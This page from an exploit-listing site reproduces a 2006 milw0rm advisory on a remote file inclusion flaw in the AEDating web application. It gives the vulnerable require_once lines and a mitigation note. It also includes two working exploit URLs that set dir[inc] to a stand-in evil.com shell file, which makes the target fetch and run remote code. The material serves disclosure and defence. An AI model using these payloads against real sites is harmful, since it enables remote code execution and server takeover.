header-logo
Suggest Exploit
vendor:
AEDating
by:
milw0rm.com
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: AEDating
Affected Version From: all versions
Affected Version To: all versions
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

AEDating (all versions) Remote File inclusion.

A vulnerability exists in AEDating (all versions) which allows a remote attacker to include a file from a remote host. The vulnerability is due to the application including files based on user-supplied input without proper validation. An attacker can exploit this vulnerability to include arbitrary files from remote hosts, which can lead to the execution of arbitrary code on the vulnerable system. This can be exploited by sending a specially crafted HTTP request containing directory traversal sequences and a URL to a malicious host.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized and is not used to include files from remote hosts.
Source

Exploit-DB raw data:

AEDating (all versions) Remote File inclusion.

Vulnerable code:

/inc/design.inc.php
/inc/admin_design.inc.php

require_once( "$dir[inc]db.inc.php" );
require_once( "$dir[inc]prof.inc.php" );

Exploit:
http://site.com/[script_path]/inc/design.inc.php?dir[inc]=http://evil.com/shell.txt?
http://site.com/[script_path]/inc/admin_design.inc.php?dir[inc]=http://evil.com/shell.txt ?

Video:
http://rapidshare.de/files/33316468/AEDating_SQL.rar.html
http://www.megaupload.com/?d=O1W4DX97

# milw0rm.com [2006-09-16]

Navigation

Suggest Exploit

Services By CQR